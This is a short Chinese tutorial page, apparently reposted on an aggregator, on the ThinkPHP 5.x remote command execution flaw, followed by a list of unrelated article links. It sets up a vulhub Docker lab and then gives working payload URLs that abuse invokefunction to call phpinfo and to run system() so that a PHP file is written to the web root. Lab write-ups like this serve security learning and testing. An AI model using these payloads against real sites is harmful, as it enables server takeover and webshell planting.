当前位置: 首页 > news >正文

常⻅框架漏洞--ThinkPHP

news 2025/7/7 0:09:56

Thinkphp5x远程命令执⾏及getshell

环境搭建

cd vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

访问网址

漏洞利⽤

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

根⽬录⽣成1.php ⽂件,输出phpinfo
另一种方法,直接工具操作
http://www.dtcms.com/a/88770.html

相关文章:

  • Python虚拟环境:从入门到实战指南
  • vscode设置console.log的快捷输出方式
  • 量化研究--小果聚宽交易系统上线高速服务器,提供源代码
  • 『 C++ 』原生字符串:让字符串处理更轻松
  • 0基础学前端----移动WEB开发之flex布局DAY15
  • 单片机 - 串行通信 并行通信、接口类型及常见通信协议详细解析
  • 文件上传的小点总结(2)
  • 用DrissionPage升级网易云音乐爬虫:更稳定高效地获取歌单音乐(附原码)
  • 【leetcode hot 100 35】搜索插入位置
  • ZIP_STORED和ZIP_LZMA没有compresslevel参数!
  • html css js网页制作成品——HTML+CSS+js迪奥口红网站网页设计(4页)附源码
  • 智能汽车图像及视频处理方案,支持视频实时拍摄特效能力
  • Docker-Compose部署 EasySearch 异常问题排查
  • 探索AI的无限可能,体验智能对话的未来,大模型 API 演示
  • Qt 高效读写JSON文件,玩转QJsonDocument与QJsonObject
  • Unity跨平台构建快速回顾
  • [React 进阶系列] 组合组件 复合组件
  • Ubuntu系统使用nmcli配置静态IP
  • 机器学习之条件概率
  • 知识篇 | Oracle的 TEMP表空间管理和优化
  • 【Java语言】学习笔记-08面向对象【中级】继承的本质分析、快速入门、方法重写、Super关键字的基本语法和使用等细节详解(中)
  • Rust+WebAssembly:开启浏览器3D渲染新时代
  • 微信自动跟圈指南;一个号发其他号自动转发
  • 【AndroidRTC-10】webrtc是如何确定双端的编解码类型?
  • GC overhead limit exceeded---Java 虚拟机 (JVM) 在进行垃圾回收内存量非常少解决
  • 【机器人】复现 GrainGrasp 精细指导的灵巧手抓取
  • Android开发检查是否是各大厂商手机的工具类
  • Redis 服务搭建
  • Spring MVC的请求和响应
  • JavaScript 函数基础